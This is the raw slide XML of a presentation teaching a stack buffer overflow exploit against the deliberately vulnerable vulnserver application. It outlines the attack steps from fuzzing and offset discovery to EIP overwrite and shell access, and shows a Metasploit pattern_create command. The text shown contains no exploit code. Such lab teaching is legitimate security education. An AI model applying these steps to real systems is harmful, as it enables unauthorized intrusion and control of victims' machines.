              </a:rPr>
              <a:t>When the buffer space fails to handle the data in the buffer space efficiently; i.e. the data is the buffer space exceeds the allocated buffer space, the buffer may overflow causing the adjacent memory locations to be written by the data. Lack of input sanitization in the application code, may leave the application vulnerable to a buffer overflow vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2424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61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E43F29-65D8-2124-3341-68B38B8CCB0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Anatomy of a Buffer Overflow Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>In a simple application, user input is stored in a buffer with a limit of 8 characters. If the user enters a longer name, the buffer overflows into adjacent memory locations. Without proper input validation, the application crashes when attempting to execute invalid instructions. An attacker can exploit this by determining the precise number of bytes needed to crash the application, then supplying valid input to fill the buffer and overwrite adjacent memory with malicious shellcode. When the application attempts to execute the next instruction, it runs the attacker's code, allowing them to control the flow of execution.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59DB2B88-EEFA-5B6F-85C3-332B3417B6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767" y="2010577"/>
            <a:ext cx="9768146" cy="3093098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BFAED16-0EF9-8819-9A01-E556E36F07BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5103675"/>
            <a:ext cx="12040233" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2424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669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B8C069-B31C-3CC3-8D58-752E23D6F960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Demonstration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>For demonstration purposes, we’ll be using the determinedly vulnerable built application, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. It is a command-line windows application, so our victim or the target OS will be a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> machine, which we will be attacking using our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. The ultimate goal of the attack is to gain access to the Windows machine. For debugging purposes, and looking at the registers and memory, we’ll be using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>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Immunity Debugger” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. For shellcode generation we will use ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, and ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> as the listener.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The entire attack is based upon the following steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing the application to determine the crashing of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Finding the exact location of the crash (called the Offset)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Confirming the offset, and control over the flow of execution by Overwriting the Instruction Pointer (EIP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Checking for bad characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Finding the application library with no memory protections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>And finally, gaining access to the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>To save time, we will not be spiking the application to see which input command is vulnerable to the attack, instead we will start from fuzzing because we know that the ‘TRUN’ command is vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Running Immunity Debugger as administrator and attaching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> in Immunity Debugger, and then pressing the play button, to allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> start accepting connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4005153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CF03E9-4133-BD96-D4E9-2AD05442ACD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Fuzzing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>We fuzz the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t> by sending a large number of the letter ‘A’ in incremental order. After some time, we find in Immunity Debugger that the application has crashed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="242424"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="source-serif-pro"/>
              </a:rPr>
              <a:t>When we look at our fuzzing script, we find that our application crashed at 2500 bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="242424"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="source-serif-pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{633E7A0D-86B0-A110-8F3C-44C8844D40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7944" y="1093469"/>
            <a:ext cx="6186080" cy="3152657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D0EDB2-E0FC-5AC2-FF17-AF30549B52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464" y="4794184"/>
            <a:ext cx="10217021" cy="1418254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="985070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8A481E-C7F4-3EA8-F9AD-8B8FFE520549}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" u="sng" dirty="0"/>
              <a:t>Locating the Offset:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Restarting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>vulnserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> from within Immunity, now we generate a random pattern of 2500 bytes of never repeating characters. For this purpose, we use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>pattern_create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> ruby script.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>$ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-framework/tools/exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>pattern_create.rb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> -l 2500</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
